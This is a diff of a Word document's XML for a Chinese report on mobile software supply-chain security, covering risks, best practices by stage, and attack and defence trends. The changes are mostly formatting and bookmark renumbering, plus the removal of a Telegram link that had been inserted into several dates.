+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10060,19 +10252,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>26</w:t>
+        <w:t>2026</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10121,6 +10301,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10139,19 +10322,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>26</w:t>
+        <w:t>2026</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10188,6 +10359,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10218,6 +10392,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10236,6 +10415,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10267,6 +10449,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10293,6 +10478,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10323,12 +10511,16 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc242275496"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc242453632"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">4.4 </w:t>
       </w:r>
       <w:r>
@@ -10349,9 +10541,14 @@
         </w:rPr>
         <w:t>）风险</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
-    </w:p>
-    <w:p>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10367,6 +10564,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10423,6 +10625,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10441,6 +10648,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10472,6 +10682,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10491,6 +10704,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10507,6 +10723,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10529,6 +10750,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10545,19 +10771,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">24 </w:t>
+        <w:t xml:space="preserve"> 2024 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10582,6 +10796,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10594,6 +10811,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10606,6 +10826,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10615,6 +10838,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10633,6 +10861,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10664,6 +10895,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10695,6 +10929,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10732,34 +10969,41 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc242275497"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc242453633"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>五、供应链安全最佳实践</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="15"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc242453634"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>开发阶段</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="16"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc242275498"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5.1 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>开发阶段</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -10780,6 +11024,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -10851,6 +11101,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -10951,6 +11207,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11015,6 +11277,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11108,6 +11376,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11173,6 +11447,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11266,6 +11546,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11345,6 +11631,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11442,8 +11734,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc242275499"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc242453635"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -11456,7 +11751,7 @@
         </w:rPr>
         <w:t>分发阶段</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -11477,6 +11772,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11548,6 +11849,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11613,6 +11920,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11678,6 +11991,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11771,6 +12090,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11857,6 +12182,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11954,8 +12285,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc242275500"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc242453636"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -11968,7 +12302,7 @@
         </w:rPr>
         <w:t>用户层面</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -11989,6 +12323,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12060,6 +12400,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12139,6 +12485,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12204,6 +12556,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12325,6 +12683,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12404,6 +12768,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12480,38 +12850,209 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc242275501"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc242453637"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>六、趋势与展望</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="19"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Toc242453638"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">6.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>攻击趋势</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>依赖管理攻击增加</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CocoaPods/SPM/npm </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>成为主要攻击目标，攻击者通过劫持孤儿库注入恶意代码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">2. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">CI/CD </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>系统攻击</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：攻击者获取</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CI/CD </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>系统访问权限，在构建时注入恶意代码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>企业证书滥用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：黑市上企业证书交易活跃，用于分发恶意应用</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">4. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>第三方应用商店风险</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：欧盟</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> DMA </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>要求开放第三方商店，审核能力参差不齐</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc242275502"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">6.1 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>攻击趋势</w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc242453639"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">6.2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>防御趋势</w:t>
       </w:r>
       <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">1. </w:t>
@@ -12521,7 +13062,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>依赖管理攻击增加</w:t>
+        <w:t>依赖签名验证</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12533,18 +13074,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">CocoaPods/SPM/npm </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>成为主要攻击目标，攻击者通过劫持孤儿库注入恶意代码</w:t>
+        <w:t xml:space="preserve">CocoaPods/SPM </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>可能引入依赖签名验证机制</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">2. </w:t>
@@ -12554,37 +13098,175 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
+        <w:t>构建环境隔离</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t xml:space="preserve">CI/CD </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>系统加强隔离，减少攻击面</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>系统攻击</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：攻击者获取</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> CI/CD </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>系统访问权限，在构建时注入恶意代码</w:t>
+        <w:t>证书使用监控</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Apple </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>加强企业证书使用监控，滥用则吊销</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">4. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>第三方商店审核</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Apple </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>要求第三方商店承担审核责任</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="_Toc242453640"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">6.3 </w:t>
